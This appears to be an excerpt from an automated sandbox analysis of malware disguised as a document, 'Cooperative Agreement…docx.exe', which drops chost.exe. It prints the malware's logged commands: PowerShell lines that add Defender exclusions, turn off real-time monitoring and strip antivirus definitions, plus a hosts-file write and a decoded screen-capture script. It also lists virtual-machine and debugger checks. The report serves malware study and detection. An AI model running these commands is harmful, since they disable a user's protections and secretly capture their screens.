                    Source: getmac.exe, 00000058.00000002.2226197181.000001B3DC530000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224364583.000001B3DC52C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\Linkageroute
                    Source: chost.exe, 00000011.00000003.2047634616.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048319230.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376637980.0000016E18498000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmusrvc
                    Source: getmac.exe, 00000058.00000003.2224062995.000001B3DC576000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000002.2226197181.000001B3DC530000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2223926320.000001B3DC571000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224364583.000001B3DC52C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000002.2226539281.000001B3DC579000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
                    Source: chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                    Source: chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69437A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF69437A684
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeCode function: 0_2_0040A756 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_0040A756
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF6943834F0 GetProcessHeap,16_2_00007FF6943834F0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeCode function: 0_2_00409950 SetUnhandledExceptionFilter,0_2_00409950
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeCode function: 0_2_00409930 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,0_2_00409930
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69437A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF69437A684
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69436C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF69436C910
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69436D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF69436D19C
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF69436D37C SetUnhandledExceptionFilter,16_2_00007FF69436D37C
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69437A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF69437A684
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69436C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00007FF69436C910
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69436D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF69436D19C
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF69436D37C SetUnhandledExceptionFilter,17_2_00007FF69436D37C
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDEAE43028 IsProcessorFeaturePresent,00007FFE0E141730,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE0E141730,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FFDEAE43028
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A41CB7 SetUnhandledExceptionFilter,17_2_00007FFDF6A41CB7
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6A4212B IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FFDF6A4212B
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF6ABDFFC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00007FFDF6ABDFFC

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe""Jump to behavior
